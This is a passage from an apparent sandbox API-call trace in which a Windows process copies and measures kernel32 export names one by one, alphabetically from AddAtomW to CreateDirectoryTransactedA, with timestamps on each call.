lpString1=0x239ec2c, lpString2="AddAtomW" | out: lpString1="AddAtomW") returned="AddAtomW" [0179.086] lstrlenA (lpString="ADDATOMW") returned 8 [0179.086] lstrcpyA (in: lpString1=0x239ec2c, lpString2="AddConsoleAliasA" | out: lpString1="AddConsoleAliasA") returned="AddConsoleAliasA" [0179.086] lstrlenA (lpString="ADDCONSOLEALIASA") returned 16 [0179.086] lstrcpyA (in: lpString1=0x239ec2c, lpString2="AddConsoleAliasW" | out: lpString1="AddConsoleAliasW") returned="AddConsoleAliasW" [0179.086] lstrlenA (lpString="ADDCONSOLEALIASW") returned 16 [0179.086] lstrcpyA (in: lpString1=0x239ec2c, lpString2="AddIntegrityLabelToBoundaryDescriptor" | out: lpString1="AddIntegrityLabelToBoundaryDescriptor") returned="AddIntegrityLabelToBoundaryDescriptor" [0179.086] lstrlenA (lpString="ADDINTEGRITYLABELTOBOUNDARYDESCRIPTOR") returned 37 [0179.086] lstrcpyA (in: lpString1=0x239ec2c, lpString2="AddLocalAlternateComputerNameA" | out: lpString1="AddLocalAlternateComputerNameA") returned="AddLocalAlternateComputerNameA" [0179.086] lstrlenA (lpString="ADDLOCALALTERNATECOMPUTERNAMEA") returned 30 [0179.086] lstrcpyA (in: lpString1=0x239ec2c, lpString2="AddLocalAlternateComputerNameW" | out: lpString1="AddLocalAlternateComputerNameW") returned="AddLocalAlternateComputerNameW" [0179.086] lstrlenA (lpString="ADDLOCALALTERNATECOMPUTERNAMEW") returned 30 [0179.086] lstrcpyA (in: lpString1=0x239ec2c, lpString2="AddRefActCtx" | out: lpString1="AddRefActCtx") returned="AddRefActCtx" [0179.086] lstrlenA (lpString="ADDREFACTCTX") returned 12 [0179.086] lstrcpyA (in: lpString1=0x239ec2c, lpString2="AddSIDToBoundaryDescriptor" | out: lpString1="AddSIDToBoundaryDescriptor") returned="AddSIDToBoundaryDescriptor" [0179.086] lstrlenA (lpString="ADDSIDTOBOUNDARYDESCRIPTOR") returned 26 [0179.086] lstrcpyA (in: lpString1=0x239ec2c, lpString2="AddSecureMemoryCacheCallback" | out: lpString1="AddSecureMemoryCacheCallback") returned="AddSecureMemoryCacheCallback" [0179.086] lstrlenA (lpString="ADDSECUREMEMORYCACHECALLBACK") returned 28 [0179.086] lstrcpyA (in: lpString1=0x239ec2c, lpString2="AddVectoredContinueHandler" | out: lpString1="AddVectoredContinueHandler") returned="AddVectoredContinueHandler" [0179.086] lstrlenA (lpString="ADDVECTOREDCONTINUEHANDLER") returned 26 [0179.086] lstrcpyA (in: lpString1=0x239ec2c, lpString2="AddVectoredExceptionHandler" | out: lpString1="AddVectoredExceptionHandler") returned="AddVectoredExceptionHandler" [0179.086] lstrlenA (lpString="ADDVECTOREDEXCEPTIONHANDLER") returned 27 [0179.087] lstrcpyA (in: lpString1=0x239ec2c, lpString2="AdjustCalendarDate" | out: lpString1="AdjustCalendarDate") returned="AdjustCalendarDate" [0179.087] lstrlenA (lpString="ADJUSTCALENDARDATE") returned 18 [0179.087] lstrcpyA (in: lpString1=0x239ec2c, lpString2="AllocConsole" | out: lpString1="AllocConsole") returned="AllocConsole" [0179.087] lstrlenA (lpString="ALLOCCONSOLE") returned 12 [0179.087] lstrcpyA (in: lpString1=0x239ec2c, lpString2="AllocateUserPhysicalPages" | out: lpString1="AllocateUserPhysicalPages") returned="AllocateUserPhysicalPages" [0179.087] lstrlenA (lpString="ALLOCATEUSERPHYSICALPAGES") returned 25 [0179.087] lstrcpyA (in: lpString1=0x239ec2c, lpString2="AllocateUserPhysicalPagesNuma" | out: lpString1="AllocateUserPhysicalPagesNuma") returned="AllocateUserPhysicalPagesNuma" [0179.087] lstrlenA (lpString="ALLOCATEUSERPHYSICALPAGESNUMA") returned 29 [0179.087] lstrcpyA (in: lpString1=0x239ec2c, lpString2="ApplicationRecoveryFinished" | out: lpString1="ApplicationRecoveryFinished") returned="ApplicationRecoveryFinished" [0179.087] lstrlenA (lpString="APPLICATIONRECOVERYFINISHED") returned 27 [0179.087] lstrcpyA (in: lpString1=0x239ec2c, lpString2="ApplicationRecoveryInProgress" | out: lpString1="ApplicationRecoveryInProgress") returned="ApplicationRecoveryInProgress" [0179.087] lstrlenA (lpString="APPLICATIONRECOVERYINPROGRESS") returned 29 [0179.087] lstrcpyA (in: lpString1=0x239ec2c, lpString2="AreFileApisANSI" | out: lpString1="AreFileApisANSI") returned="AreFileApisANSI" [0179.087] lstrlenA (lpString="AREFILEAPISANSI") returned 15 [0179.087] lstrcpyA (in: lpString1=0x239ec2c, lpString2="AssignProcessToJobObject" | out: lpString1="AssignProcessToJobObject") returned="AssignProcessToJobObject" [0179.087] lstrlenA (lpString="ASSIGNPROCESSTOJOBOBJECT") returned 24 [0179.087] lstrcpyA (in: lpString1=0x239ec2c, lpString2="AttachConsole" | out: lpString1="AttachConsole") returned="AttachConsole" [0179.087] lstrlenA (lpString="ATTACHCONSOLE") returned 13 [0179.087] lstrcpyA (in: lpString1=0x239ec2c, lpString2="BackupRead" | out: lpString1="BackupRead") returned="BackupRead" [0179.087] lstrlenA (lpString="BACKUPREAD") returned 10 [0179.087] lstrcpyA (in: lpString1=0x239ec2c, lpString2="BackupSeek" | out: lpString1="BackupSeek") returned="BackupSeek" [0179.087] lstrlenA (lpString="BACKUPSEEK") returned 10 [0179.087] lstrcpyA (in: lpString1=0x239ec2c, lpString2="BackupWrite" | out: lpString1="BackupWrite") returned="BackupWrite" [0179.087] lstrlenA (lpString="BACKUPWRITE") returned 11 [0179.087] lstrcpyA (in: lpString1=0x239ec2c, lpString2="BaseCheckAppcompatCache" | out: lpString1="BaseCheckAppcompatCache") returned="BaseCheckAppcompatCache" [0179.087] lstrlenA (lpString="BASECHECKAPPCOMPATCACHE") returned 23 [0179.087] lstrcpyA (in: lpString1=0x239ec2c, lpString2="BaseCheckAppcompatCacheEx" | out: lpString1="BaseCheckAppcompatCacheEx") returned="BaseCheckAppcompatCacheEx" [0179.087] lstrlenA (lpString="BASECHECKAPPCOMPATCACHEEX") returned 25 [0179.087] lstrcpyA (in: lpString1=0x239ec2c, lpString2="BaseCheckRunApp" | out: lpString1="BaseCheckRunApp") returned="BaseCheckRunApp" [0179.087] lstrlenA (lpString="BASECHECKRUNAPP") returned 15 [0179.087] lstrcpyA (in: lpString1=0x239ec2c, lpString2="BaseCleanupAppcompatCacheSupport" | out: lpString1="BaseCleanupAppcompatCacheSupport") returned="BaseCleanupAppcompatCacheSupport" [0179.087] lstrlenA (lpString="BASECLEANUPAPPCOMPATCACHESUPPORT") returned 32 [0179.087] lstrcpyA (in: lpString1=0x239ec2c, lpString2="BaseDllReadWriteIniFile" | out: lpString1="BaseDllReadWriteIniFile") returned="BaseDllReadWriteIniFile" [0179.087] lstrlenA (lpString="BASEDLLREADWRITEINIFILE") returned 23 [0179.087] lstrcpyA (in: lpString1=0x239ec2c, lpString2="BaseDumpAppcompatCache" | out: lpString1="BaseDumpAppcompatCache") returned="BaseDumpAppcompatCache" [0179.087] lstrlenA (lpString="BASEDUMPAPPCOMPATCACHE") returned 22 [0179.087] lstrcpyA (in: lpString1=0x239ec2c, lpString2="BaseFlushAppcompatCache" | out: lpString1="BaseFlushAppcompatCache") returned="BaseFlushAppcompatCache" [0179.088] lstrlenA (lpString="BASEFLUSHAPPCOMPATCACHE") returned 23 [0179.088] lstrcpyA (in: lpString1=0x239ec2c, lpString2="BaseFormatObjectAttributes" | out: lpString1="BaseFormatObjectAttributes") returned="BaseFormatObjectAttributes" [0179.088] lstrlenA (lpString="BASEFORMATOBJECTATTRIBUTES") returned 26 [0179.088] lstrcpyA (in: lpString1=0x239ec2c, lpString2="BaseFormatTimeOut" | out: lpString1="BaseFormatTimeOut") returned="BaseFormatTimeOut" [0179.088] lstrlenA (lpString="BASEFORMATTIMEOUT") returned 17 [0179.088] lstrcpyA (in: lpString1=0x239ec2c, lpString2="BaseGenerateAppCompatData" | out: lpString1="BaseGenerateAppCompatData") returned="BaseGenerateAppCompatData" [0179.088] lstrlenA (lpString="BASEGENERATEAPPCOMPATDATA") returned 25 [0179.088] lstrcpyA (in: lpString1=0x239ec2c, lpString2="BaseGetNamedObjectDirectory" | out: lpString1="BaseGetNamedObjectDirectory") returned="BaseGetNamedObjectDirectory" [0179.088] lstrlenA (lpString="BASEGETNAMEDOBJECTDIRECTORY") returned 27 [0179.088] lstrcpyA (in: lpString1=0x239ec2c, lpString2="BaseInitAppcompatCacheSupport" | out: lpString1="BaseInitAppcompatCacheSupport") returned="BaseInitAppcompatCacheSupport" [0179.088] lstrlenA (lpString="BASEINITAPPCOMPATCACHESUPPORT") returned 29 [0179.088] lstrcpyA (in: lpString1=0x239ec2c, lpString2="BaseIsAppcompatInfrastructureDisabled" | out: lpString1="BaseIsAppcompatInfrastructureDisabled") returned="BaseIsAppcompatInfrastructureDisabled" [0179.088] lstrlenA (lpString="BASEISAPPCOMPATINFRASTRUCTUREDISABLED") returned 37 [0179.088] lstrcpyA (in: lpString1=0x239ec2c, lpString2="BaseQueryModuleData" | out: lpString1="BaseQueryModuleData") returned="BaseQueryModuleData" [0179.088] lstrlenA (lpString="BASEQUERYMODULEDATA") returned 19 [0179.088] lstrcpyA (in: lpString1=0x239ec2c, lpString2="BaseSetLastNTError" | out: lpString1="BaseSetLastNTError") returned="BaseSetLastNTError" [0179.088] lstrlenA (lpString="BASESETLASTNTERROR") returned 18 [0179.088] lstrcpyA (in: lpString1=0x239ec2c, lpString2="BaseThreadInitThunk" | out: lpString1="BaseThreadInitThunk") returned="BaseThreadInitThunk" [0179.088] lstrlenA (lpString="BASETHREADINITTHUNK") returned 19 [0179.088] lstrcpyA (in: lpString1=0x239ec2c, lpString2="BaseUpdateAppcompatCache" | out: lpString1="BaseUpdateAppcompatCache") returned="BaseUpdateAppcompatCache" [0179.088] lstrlenA (lpString="BASEUPDATEAPPCOMPATCACHE") returned 24 [0179.088] lstrcpyA (in: lpString1=0x239ec2c, lpString2="BaseVerifyUnicodeString" | out: lpString1="BaseVerifyUnicodeString") returned="BaseVerifyUnicodeString" [0179.088] lstrlenA (lpString="BASEVERIFYUNICODESTRING") returned 23 [0179.088] lstrcpyA (in: lpString1=0x239ec2c, lpString2="Basep8BitStringToDynamicUnicodeString" | out: lpString1="Basep8BitStringToDynamicUnicodeString") returned="Basep8BitStringToDynamicUnicodeString" [0179.088] lstrlenA (lpString="BASEP8BITSTRINGTODYNAMICUNICODESTRING") returned 37 [0179.088] lstrcpyA (in: lpString1=0x239ec2c, lpString2="BasepAllocateActivationContextActivationBlock" | out: lpString1="BasepAllocateActivationContextActivationBlock") returned="BasepAllocateActivationContextActivationBlock" [0179.088] lstrlenA (lpString="BASEPALLOCATEACTIVATIONCONTEXTACTIVATIONBLOCK") returned 45 [0179.088] lstrcpyA (in: lpString1=0x239ec2c, lpString2="BasepAnsiStringToDynamicUnicodeString" | out: lpString1="BasepAnsiStringToDynamicUnicodeString") returned="BasepAnsiStringToDynamicUnicodeString" [0179.088] lstrlenA (lpString="BASEPANSISTRINGTODYNAMICUNICODESTRING") returned 37 [0179.088] lstrcpyA (in: lpString1=0x239ec2c, lpString2="BasepCheckAppCompat" | out: lpString1="BasepCheckAppCompat") returned="BasepCheckAppCompat" [0179.088] lstrlenA (lpString="BASEPCHECKAPPCOMPAT") returned 19 [0179.088] lstrcpyA (in: lpString1=0x239ec2c, lpString2="BasepCheckBadapp" | out: lpString1="BasepCheckBadapp") returned="BasepCheckBadapp" [0179.088] lstrlenA (lpString="BASEPCHECKBADAPP") returned 16 [0179.088] lstrcpyA (in: lpString1=0x239ec2c, lpString2="BasepCheckWinSaferRestrictions" | out: lpString1="BasepCheckWinSaferRestrictions") returned="BasepCheckWinSaferRestrictions" [0179.088] lstrlenA (lpString="BASEPCHECKWINSAFERRESTRICTIONS") returned 30 [0179.088] lstrcpyA (in: lpString1=0x239ec2c, lpString2="BasepFreeActivationContextActivationBlock" | out: lpString1="BasepFreeActivationContextActivationBlock") returned="BasepFreeActivationContextActivationBlock" [0179.089] lstrlenA (lpString="BASEPFREEACTIVATIONCONTEXTACTIVATIONBLOCK") returned 41 [0179.089] lstrcpyA (in: lpString1=0x239ec2c, lpString2="BasepFreeAppCompatData" | out: lpString1="BasepFreeAppCompatData") returned="BasepFreeAppCompatData" [0179.089] lstrlenA (lpString="BASEPFREEAPPCOMPATDATA") returned 22 [0179.089] lstrcpyA (in: lpString1=0x239ec2c, lpString2="BasepMapModuleHandle" | out: lpString1="BasepMapModuleHandle") returned="BasepMapModuleHandle" [0179.089] lstrlenA (lpString="BASEPMAPMODULEHANDLE") returned 20 [0179.089] lstrcpyA (in: lpString1=0x239ec2c, lpString2="Beep" | out: lpString1="Beep") returned="Beep" [0179.089] lstrlenA (lpString="BEEP") returned 4 [0179.089] lstrcpyA (in: lpString1=0x239ec2c, lpString2="BeginUpdateResourceA" | out: lpString1="BeginUpdateResourceA") returned="BeginUpdateResourceA" [0179.089] lstrlenA (lpString="BEGINUPDATERESOURCEA") returned 20 [0179.089] lstrcpyA (in: lpString1=0x239ec2c, lpString2="BeginUpdateResourceW" | out: lpString1="BeginUpdateResourceW") returned="BeginUpdateResourceW" [0179.089] lstrlenA (lpString="BEGINUPDATERESOURCEW") returned 20 [0179.089] lstrcpyA (in: lpString1=0x239ec2c, lpString2="BindIoCompletionCallback" | out: lpString1="BindIoCompletionCallback") returned="BindIoCompletionCallback" [0179.089] lstrlenA (lpString="BINDIOCOMPLETIONCALLBACK") returned 24 [0179.089] lstrcpyA (in: lpString1=0x239ec2c, lpString2="BuildCommDCBA" | out: lpString1="BuildCommDCBA") returned="BuildCommDCBA" [0179.089] lstrlenA (lpString="BUILDCOMMDCBA") returned 13 [0179.089] lstrcpyA (in: lpString1=0x239ec2c, lpString2="BuildCommDCBAndTimeoutsA" | out: lpString1="BuildCommDCBAndTimeoutsA") returned="BuildCommDCBAndTimeoutsA" [0179.089] lstrlenA (lpString="BUILDCOMMDCBANDTIMEOUTSA") returned 24 [0179.089] lstrcpyA (in: lpString1=0x239ec2c, lpString2="BuildCommDCBAndTimeoutsW" | out: lpString1="BuildCommDCBAndTimeoutsW") returned="BuildCommDCBAndTimeoutsW" [0179.089] lstrlenA (lpString="BUILDCOMMDCBANDTIMEOUTSW") returned 24 [0179.089] lstrcpyA (in: lpString1=0x239ec2c, lpString2="BuildCommDCBW" | out: lpString1="BuildCommDCBW") returned="BuildCommDCBW" [0179.089] lstrlenA (lpString="BUILDCOMMDCBW") returned 13 [0179.089] lstrcpyA (in: lpString1=0x239ec2c, lpString2="CallNamedPipeA" | out: lpString1="CallNamedPipeA") returned="CallNamedPipeA" [0179.089] lstrlenA (lpString="CALLNAMEDPIPEA") returned 14 [0179.089] lstrcpyA (in: lpString1=0x239ec2c, lpString2="CallNamedPipeW" | out: lpString1="CallNamedPipeW") returned="CallNamedPipeW" [0179.089] lstrlenA (lpString="CALLNAMEDPIPEW") returned 14 [0179.089] lstrcpyA (in: lpString1=0x239ec2c, lpString2="CallbackMayRunLong" | out: lpString1="CallbackMayRunLong") returned="CallbackMayRunLong" [0179.089] lstrlenA (lpString="CALLBACKMAYRUNLONG") returned 18 [0179.089] lstrcpyA (in: lpString1=0x239ec2c, lpString2="CancelDeviceWakeupRequest" | out: lpString1="CancelDeviceWakeupRequest") returned="CancelDeviceWakeupRequest" [0179.089] lstrlenA (lpString="CANCELDEVICEWAKEUPREQUEST") returned 25 [0179.089] lstrcpyA (in: lpString1=0x239ec2c, lpString2="CancelIo" | out: lpString1="CancelIo") returned="CancelIo" [0179.089] lstrlenA (lpString="CANCELIO") returned 8 [0179.089] lstrcpyA (in: lpString1=0x239ec2c, lpString2="CancelIoEx" | out: lpString1="CancelIoEx") returned="CancelIoEx" [0179.089] lstrlenA (lpString="CANCELIOEX") returned 10 [0179.089] lstrcpyA (in: lpString1=0x239ec2c, lpString2="CancelSynchronousIo" | out: lpString1="CancelSynchronousIo") returned="CancelSynchronousIo" [0179.089] lstrlenA (lpString="CANCELSYNCHRONOUSIO") returned 19 [0179.089] lstrcpyA (in: lpString1=0x239ec2c, lpString2="CancelThreadpoolIo" | out: lpString1="CancelThreadpoolIo") returned="CancelThreadpoolIo" [0179.089] lstrlenA (lpString="CANCELTHREADPOOLIO") returned 18 [0179.090] lstrcpyA (in: lpString1=0x239ec2c, lpString2="CancelTimerQueueTimer" | out: lpString1="CancelTimerQueueTimer") returned="CancelTimerQueueTimer" [0179.090] lstrlenA (lpString="CANCELTIMERQUEUETIMER") returned 21 [0179.090] lstrcpyA (in: lpString1=0x239ec2c, lpString2="CancelWaitableTimer" | out: lpString1="CancelWaitableTimer") returned="CancelWaitableTimer" [0179.090] lstrlenA (lpString="CANCELWAITABLETIMER") returned 19 [0179.090] lstrcpyA (in: lpString1=0x239ec2c, lpString2="ChangeTimerQueueTimer" | out: lpString1="ChangeTimerQueueTimer") returned="ChangeTimerQueueTimer" [0179.090] lstrlenA (lpString="CHANGETIMERQUEUETIMER") returned 21 [0179.090] lstrcpyA (in: lpString1=0x239ec2c, lpString2="CheckElevation" | out: lpString1="CheckElevation") returned="CheckElevation" [0179.090] lstrlenA (lpString="CHECKELEVATION") returned 14 [0179.090] lstrcpyA (in: lpString1=0x239ec2c, lpString2="CheckElevationEnabled" | out: lpString1="CheckElevationEnabled") returned="CheckElevationEnabled" [0179.090] lstrlenA (lpString="CHECKELEVATIONENABLED") returned 21 [0179.090] lstrcpyA (in: lpString1=0x239ec2c, lpString2="CheckForReadOnlyResource" | out: lpString1="CheckForReadOnlyResource") returned="CheckForReadOnlyResource" [0179.090] lstrlenA (lpString="CHECKFORREADONLYRESOURCE") returned 24 [0179.090] lstrcpyA (in: lpString1=0x239ec2c, lpString2="CheckNameLegalDOS8Dot3A" | out: lpString1="CheckNameLegalDOS8Dot3A") returned="CheckNameLegalDOS8Dot3A" [0179.090] lstrlenA (lpString="CHECKNAMELEGALDOS8DOT3A") returned 23 [0179.090] lstrcpyA (in: lpString1=0x239ec2c, lpString2="CheckNameLegalDOS8Dot3W" | out: lpString1="CheckNameLegalDOS8Dot3W") returned="CheckNameLegalDOS8Dot3W" [0179.090] lstrlenA (lpString="CHECKNAMELEGALDOS8DOT3W") returned 23 [0179.090] lstrcpyA (in: lpString1=0x239ec2c, lpString2="CheckRemoteDebuggerPresent" | out: lpString1="CheckRemoteDebuggerPresent") returned="CheckRemoteDebuggerPresent" [0179.090] lstrlenA (lpString="CHECKREMOTEDEBUGGERPRESENT") returned 26 [0179.090] lstrcpyA (in: lpString1=0x239ec2c, lpString2="ClearCommBreak" | out: lpString1="ClearCommBreak") returned="ClearCommBreak" [0179.090] lstrlenA (lpString="CLEARCOMMBREAK") returned 14 [0179.090] lstrcpyA (in: lpString1=0x239ec2c, lpString2="ClearCommError" | out: lpString1="ClearCommError") returned="ClearCommError" [0179.090] lstrlenA (lpString="CLEARCOMMERROR") returned 14 [0179.090] lstrcpyA (in: lpString1=0x239ec2c, lpString2="CloseConsoleHandle" | out: lpString1="CloseConsoleHandle") returned="CloseConsoleHandle" [0179.090] lstrlenA (lpString="CLOSECONSOLEHANDLE") returned 18 [0179.090] lstrcpyA (in: lpString1=0x239ec2c, lpString2="CloseHandle" | out: lpString1="CloseHandle") returned="CloseHandle" [0179.090] lstrlenA (lpString="CLOSEHANDLE") returned 11 [0179.090] lstrcpyA (in: lpString1=0x239ec2c, lpString2="ClosePrivateNamespace" | out: lpString1="ClosePrivateNamespace") returned="ClosePrivateNamespace" [0179.090] lstrlenA (lpString="CLOSEPRIVATENAMESPACE") returned 21 [0179.090] lstrcpyA (in: lpString1=0x239ec2c, lpString2="CloseProfileUserMapping" | out: lpString1="CloseProfileUserMapping") returned="CloseProfileUserMapping" [0179.090] lstrlenA (lpString="CLOSEPROFILEUSERMAPPING") returned 23 [0179.090] lstrcpyA (in: lpString1=0x239ec2c, lpString2="CloseThreadpool" | out: lpString1="CloseThreadpool") returned="CloseThreadpool" [0179.090] lstrlenA (lpString="CLOSETHREADPOOL") returned 15 [0179.090] lstrcpyA (in: lpString1=0x239ec2c, lpString2="CloseThreadpoolCleanupGroup" | out: lpString1="CloseThreadpoolCleanupGroup") returned="CloseThreadpoolCleanupGroup" [0179.090] lstrlenA (lpString="CLOSETHREADPOOLCLEANUPGROUP") returned 27 [0179.090] lstrcpyA (in: lpString1=0x239ec2c, lpString2="CloseThreadpoolCleanupGroupMembers" | out: lpString1="CloseThreadpoolCleanupGroupMembers") returned="CloseThreadpoolCleanupGroupMembers" [0179.090] lstrlenA (lpString="CLOSETHREADPOOLCLEANUPGROUPMEMBERS") returned 34 [0179.090] lstrcpyA (in: lpString1=0x239ec2c, lpString2="CloseThreadpoolIo" | out: lpString1="CloseThreadpoolIo") returned="CloseThreadpoolIo" [0179.091] lstrlenA (lpString="CLOSETHREADPOOLIO") returned 17 [0179.091] lstrcpyA (in: lpString1=0x239ec2c, lpString2="CloseThreadpoolTimer" | out: lpString1="CloseThreadpoolTimer") returned="CloseThreadpoolTimer" [0179.091] lstrlenA (lpString="CLOSETHREADPOOLTIMER") returned 20 [0179.091] lstrcpyA (in: lpString1=0x239ec2c, lpString2="CloseThreadpoolWait" | out: lpString1="CloseThreadpoolWait") returned="CloseThreadpoolWait" [0179.091] lstrlenA (lpString="CLOSETHREADPOOLWAIT") returned 19 [0179.091] lstrcpyA (in: lpString1=0x239ec2c, lpString2="CloseThreadpoolWork" | out: lpString1="CloseThreadpoolWork") returned="CloseThreadpoolWork" [0179.091] lstrlenA (lpString="CLOSETHREADPOOLWORK") returned 19 [0179.091] lstrcpyA (in: lpString1=0x239ec2c, lpString2="CmdBatNotification" | out: lpString1="CmdBatNotification") returned="CmdBatNotification" [0179.091] lstrlenA (lpString="CMDBATNOTIFICATION") returned 18 [0179.091] lstrcpyA (in: lpString1=0x239ec2c, lpString2="CommConfigDialogA" | out: lpString1="CommConfigDialogA") returned="CommConfigDialogA" [0179.091] lstrlenA (lpString="COMMCONFIGDIALOGA") returned 17 [0179.091] lstrcpyA (in: lpString1=0x239ec2c, lpString2="CommConfigDialogW" | out: lpString1="CommConfigDialogW") returned="CommConfigDialogW" [0179.091] lstrlenA (lpString="COMMCONFIGDIALOGW") returned 17 [0179.091] lstrcpyA (in: lpString1=0x239ec2c, lpString2="CompareCalendarDates" | out: lpString1="CompareCalendarDates") returned="CompareCalendarDates" [0179.091] lstrlenA (lpString="COMPARECALENDARDATES") returned 20 [0179.091] lstrcpyA (in: lpString1=0x239ec2c, lpString2="CompareFileTime" | out: lpString1="CompareFileTime") returned="CompareFileTime" [0179.091] lstrlenA (lpString="COMPAREFILETIME") returned 15 [0179.091] lstrcpyA (in: lpString1=0x239ec2c, lpString2="CompareStringA" | out: lpString1="CompareStringA") returned="CompareStringA" [0179.091] lstrlenA (lpString="COMPARESTRINGA") returned 14 [0179.091] lstrcpyA (in: lpString1=0x239ec2c, lpString2="CompareStringEx" | out: lpString1="CompareStringEx") returned="CompareStringEx" [0179.091] lstrlenA (lpString="COMPARESTRINGEX") returned 15 [0179.091] lstrcpyA (in: lpString1=0x239ec2c, lpString2="CompareStringOrdinal" | out: lpString1="CompareStringOrdinal") returned="CompareStringOrdinal" [0179.091] lstrlenA (lpString="COMPARESTRINGORDINAL") returned 20 [0179.091] lstrcpyA (in: lpString1=0x239ec2c, lpString2="CompareStringW" | out: lpString1="CompareStringW") returned="CompareStringW" [0179.091] lstrlenA (lpString="COMPARESTRINGW") returned 14 [0179.091] lstrcpyA (in: lpString1=0x239ec2c, lpString2="ConnectNamedPipe" | out: lpString1="ConnectNamedPipe") returned="ConnectNamedPipe" [0179.091] lstrlenA (lpString="CONNECTNAMEDPIPE") returned 16 [0179.091] lstrcpyA (in: lpString1=0x239ec2c, lpString2="ConsoleMenuControl" | out: lpString1="ConsoleMenuControl") returned="ConsoleMenuControl" [0179.091] lstrlenA (lpString="CONSOLEMENUCONTROL") returned 18 [0179.091] lstrcpyA (in: lpString1=0x239ec2c, lpString2="ContinueDebugEvent" | out: lpString1="ContinueDebugEvent") returned="ContinueDebugEvent" [0179.091] lstrlenA (lpString="CONTINUEDEBUGEVENT") returned 18 [0179.091] lstrcpyA (in: lpString1=0x239ec2c, lpString2="ConvertCalDateTimeToSystemTime" | out: lpString1="ConvertCalDateTimeToSystemTime") returned="ConvertCalDateTimeToSystemTime" [0179.091] lstrlenA (lpString="CONVERTCALDATETIMETOSYSTEMTIME") returned 30 [0179.091] lstrcpyA (in: lpString1=0x239ec2c, lpString2="ConvertDefaultLocale" | out: lpString1="ConvertDefaultLocale") returned="ConvertDefaultLocale" [0179.091] lstrlenA (lpString="CONVERTDEFAULTLOCALE") returned 20 [0179.091] lstrcpyA (in: lpString1=0x239ec2c, lpString2="ConvertFiberToThread" | out: lpString1="ConvertFiberToThread") returned="ConvertFiberToThread" [0179.091] lstrlenA (lpString="CONVERTFIBERTOTHREAD") returned 20 [0179.092] lstrcpyA (in: lpString1=0x239ec2c, lpString2="ConvertNLSDayOfWeekToWin32DayOfWeek" | out: lpString1="ConvertNLSDayOfWeekToWin32DayOfWeek") returned="ConvertNLSDayOfWeekToWin32DayOfWeek" [0179.092] lstrlenA (lpString="CONVERTNLSDAYOFWEEKTOWIN32DAYOFWEEK") returned 35 [0179.092] lstrcpyA (in: lpString1=0x239ec2c, lpString2="ConvertSystemTimeToCalDateTime" | out: lpString1="ConvertSystemTimeToCalDateTime") returned="ConvertSystemTimeToCalDateTime" [0179.092] lstrlenA (lpString="CONVERTSYSTEMTIMETOCALDATETIME") returned 30 [0179.092] lstrcpyA (in: lpString1=0x239ec2c, lpString2="ConvertThreadToFiber" | out: lpString1="ConvertThreadToFiber") returned="ConvertThreadToFiber" [0179.092] lstrlenA (lpString="CONVERTTHREADTOFIBER") returned 20 [0179.092] lstrcpyA (in: lpString1=0x239ec2c, lpString2="ConvertThreadToFiberEx" | out: lpString1="ConvertThreadToFiberEx") returned="ConvertThreadToFiberEx" [0179.092] lstrlenA (lpString="CONVERTTHREADTOFIBEREX") returned 22 [0179.092] lstrcpyA (in: lpString1=0x239ec2c, lpString2="CopyContext" | out: lpString1="CopyContext") returned="CopyContext" [0179.092] lstrlenA (lpString="COPYCONTEXT") returned 11 [0179.092] lstrcpyA (in: lpString1=0x239ec2c, lpString2="CopyFileA" | out: lpString1="CopyFileA") returned="CopyFileA" [0179.092] lstrlenA (lpString="COPYFILEA") returned 9 [0179.092] lstrcpyA (in: lpString1=0x239ec2c, lpString2="CopyFileExA" | out: lpString1="CopyFileExA") returned="CopyFileExA" [0179.092] lstrlenA (lpString="COPYFILEEXA") returned 11 [0179.092] lstrcpyA (in: lpString1=0x239ec2c, lpString2="CopyFileExW" | out: lpString1="CopyFileExW") returned="CopyFileExW" [0179.092] lstrlenA (lpString="COPYFILEEXW") returned 11 [0179.092] lstrcpyA (in: lpString1=0x239ec2c, lpString2="CopyFileTransactedA" | out: lpString1="CopyFileTransactedA") returned="CopyFileTransactedA" [0179.092] lstrlenA (lpString="COPYFILETRANSACTEDA") returned 19 [0179.092] lstrcpyA (in: lpString1=0x239ec2c, lpString2="CopyFileTransactedW" | out: lpString1="CopyFileTransactedW") returned="CopyFileTransactedW" [0179.092] lstrlenA (lpString="COPYFILETRANSACTEDW") returned 19 [0179.092] lstrcpyA (in: lpString1=0x239ec2c, lpString2="CopyFileW" | out: lpString1="CopyFileW") returned="CopyFileW" [0179.092] lstrlenA (lpString="COPYFILEW") returned 9 [0179.092] lstrcpyA (in: lpString1=0x239ec2c, lpString2="CopyLZFile" | out: lpString1="CopyLZFile") returned="CopyLZFile" [0179.092] lstrlenA (lpString="COPYLZFILE") returned 10 [0179.092] lstrcpyA (in: lpString1=0x239ec2c, lpString2="CreateActCtxA" | out: lpString1="CreateActCtxA") returned="CreateActCtxA" [0179.092] lstrlenA (lpString="CREATEACTCTXA") returned 13 [0179.092] lstrcpyA (in: lpString1=0x239ec2c, lpString2="CreateActCtxW" | out: lpString1="CreateActCtxW") returned="CreateActCtxW" [0179.092] lstrlenA (lpString="CREATEACTCTXW") returned 13 [0179.092] lstrcpyA (in: lpString1=0x239ec2c, lpString2="CreateBoundaryDescriptorA" | out: lpString1="CreateBoundaryDescriptorA") returned="CreateBoundaryDescriptorA" [0179.092] lstrlenA (lpString="CREATEBOUNDARYDESCRIPTORA") returned 25 [0179.092] lstrcpyA (in: lpString1=0x239ec2c, lpString2="CreateBoundaryDescriptorW" | out: lpString1="CreateBoundaryDescriptorW") returned="CreateBoundaryDescriptorW" [0179.092] lstrlenA (lpString="CREATEBOUNDARYDESCRIPTORW") returned 25 [0179.092] lstrcpyA (in: lpString1=0x239ec2c, lpString2="CreateConsoleScreenBuffer" | out: lpString1="CreateConsoleScreenBuffer") returned="CreateConsoleScreenBuffer" [0179.092] lstrlenA (lpString="CREATECONSOLESCREENBUFFER") returned 25 [0179.092] lstrcpyA (in: lpString1=0x239ec2c, lpString2="CreateDirectoryA" | out: lpString1="CreateDirectoryA") returned="CreateDirectoryA" [0179.092] lstrlenA (lpString="CREATEDIRECTORYA") returned 16 [0179.092] lstrcpyA (in: lpString1=0x239ec2c, lpString2="CreateDirectoryExA" | out: lpString1="CreateDirectoryExA") returned="CreateDirectoryExA" [0179.092] lstrlenA (lpString="CREATEDIRECTORYEXA") returned 18 [0179.093] lstrcpyA (in: lpString1=0x239ec2c, lpString2="CreateDirectoryExW" | out: lpString1="CreateDirectoryExW") returned="CreateDirectoryExW" [0179.093] lstrlenA (lpString="CREATEDIRECTORYEXW") returned 18 [0179.093] lstrcpyA (in: lpString1=0x239ec2c, lpString2="CreateDirectoryTransactedA" | out: lpString1="CreateDirectoryTransactedA") returned="CreateDirectoryTransactedA" [0179.093] 